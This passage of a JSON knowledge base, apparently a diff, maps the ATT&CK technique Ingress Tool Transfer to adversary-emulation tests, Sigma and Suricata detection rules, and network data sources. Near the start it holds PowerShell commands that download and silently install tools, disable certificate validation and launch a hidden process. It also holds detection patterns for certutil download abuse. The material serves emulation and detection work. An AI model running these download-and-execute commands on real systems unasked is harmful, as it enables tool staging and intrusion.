"\\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\redcanary.cab" + }, + "Path_replace": { + "description": "Path to replace.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\replace.exe" + } + }, + "executor": { + "command": "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} #{replace_cab} %TEMP% /A\n", + "cleanup_command": "del %TEMP%\\redcanary.cab >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "60f63260-39bb-4136-87a0-b6c2dca799fc", + "name": "Install PowerShell Core 6", + "description": "Download, install and start new process under PowerShell Core 6", + "tactic": "command-and-control", + "technique": { + "attack_id": "T1105", + "name": "Ingress Tool Transfer" + }, + "platforms": { + "windows": { + "psh": { + "command": "$wc=New-Object System.Net.WebClient;\n$output=\"PowerShellCore.msi\";\n$wc.DownloadFile(\"https://github.com/PowerShell/PowerShell/releases/download/v6.2.2/PowerShell-6.2.2-win-x64.msi\", $output);\nStart-Process msiexec.exe -ArgumentList \"/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1\" -Wait;\n$env:Path += \";C:\\Program Files\\Powershell\\6\";\nStart-Process pwsh -ArgumentList \"-c #{location} -server #{server} - group #{group}\" -WindowStyle hidden;\n", + "cleanup": "rm PowerShellCore.msi;\n" + } + } + } + }, + { + "id": "eb814e03-811a-467a-bc6d-dcd453750fa2", + "name": "Install PSTools", + "description": "Download and install PSTools by unzipping the file", + "tactic": "command-and-control", + "technique": { + "attack_id": "T1105", + "name": "Ingress Tool Transfer" + }, + "platforms": { + "windows": { + "psh": { + "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadFile(\"https://download.sysinternals.com/files/PSTools.zip\", \"PSTools.zip\");\nNew-Item -ItemType \"directory\" C:\\Windows\\System32\\PSTools -Force;\nAdd-Type -Assembly 'System.IO.Compression.FileSystem'; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"PSTools.zip\", \"C:\\Windows\\System32\\PSTools\");\n" + } + } + } + }, + { + "Rules": "ET Open", + "SID": "2027267", + "Signature": "ET ATTACK\\_RESPONSE Possible Lateral Movement - File Creation Request in Remote System32 Directory", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Suricata (NSM)", + "query": "ET ATTACK\\_RESPONSE Possible Lateral Movement - File Creation Request in Remote System32 Directory", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "experimental", + "description": "Detects Pandemic Windows Implant", + "references": [ + "https://wikileaks.org/vault7/#Pandemic", + "https://twitter.com/MalwareJake/status/870349480356454401" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ], + "author": "Florian Roth", + "detection": { + "condition": "1 of them" + }, + "fields": [ + "EventID", + "CommandLine", + "ParentCommandLine", + "Image", + "User", + "TargetObject" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection1": { + "EventID": 13, + "TargetObject": [ + "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\services\\null\\Instance*", + "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\services\\null\\Instance*", + "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet002\\services\\null\\Instance*" + ] + } + } + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection2": { + "Command": "loaddll -a *" + } + } + }, + { + "title": "Microsoft Binary Github Communication", + "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "status": "experimental", + "description": "Detects an executable in the Windows folder accessing github.com", + "references": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752" + ], + "author": "Michael Haag (idea), Florian Roth (rule)", + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "Initiated": "true", + "DestinationHostname": [ + "*.github.com", + "*.githubusercontent.com" + ], + "Image": "C:\\Windows\\\\*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown", + "@subTee in your network" + ], + "level": "high" + }, + { + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "status": "experimental", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "references": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752" + ], + "author": "Florian Roth", + "date": "2018/08/30", + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "Initiated": "true", + "DestinationHostname": [ + "*dl.dropboxusercontent.com", + "*.pastebin.com", + "*.githubusercontent.com" + ], + "Image": "C:\\Windows\\\\*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Certutil Command", + "id": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", + "status": "experimental", + "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code with the built-in certutil utility", + "author": "Florian Roth, juju4, keepwatch", + "modified": "2019/01/22", + "references": [ + "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://twitter.com/subTee/status/888102593838362624", + "https://twitter.com/subTee/status/888071631528235010", + "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", + "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", + "https://twitter.com/egre55/status/1087685529016193025", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* -decode *", + "* /decode *", + "* -decodehex *", + "* /decodehex *", + "* -urlcache *", + "* /urlcache *", + "* -verifyctl *", + "* /verifyctl *", + "* -encode *", + "* /encode *", + "*certutil* -URL*", + "*certutil* /URL*", + "*certutil* -ping*", + "*certutil* /ping*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1105", + "attack.s0189", + "attack.g0007" + ], + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "level": "high" + }, + { + "title": "Malicious payload download via Office binaries", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "status": "experimental", + "description": "Downloads payload from remote server", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Powerpnt.yml", + "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", + "Reegun J (OCBC Bank)" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/26", + "modified": "2019/11/04", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "level": "high", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": [ + "\\powerpnt.exe", + "\\winword.exe", + "\\excel.exe" + ], + "CommandLine|contains": "http" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ] + }, + [ + "4663", + "File monitoring" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "4663", + "File monitoring" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on 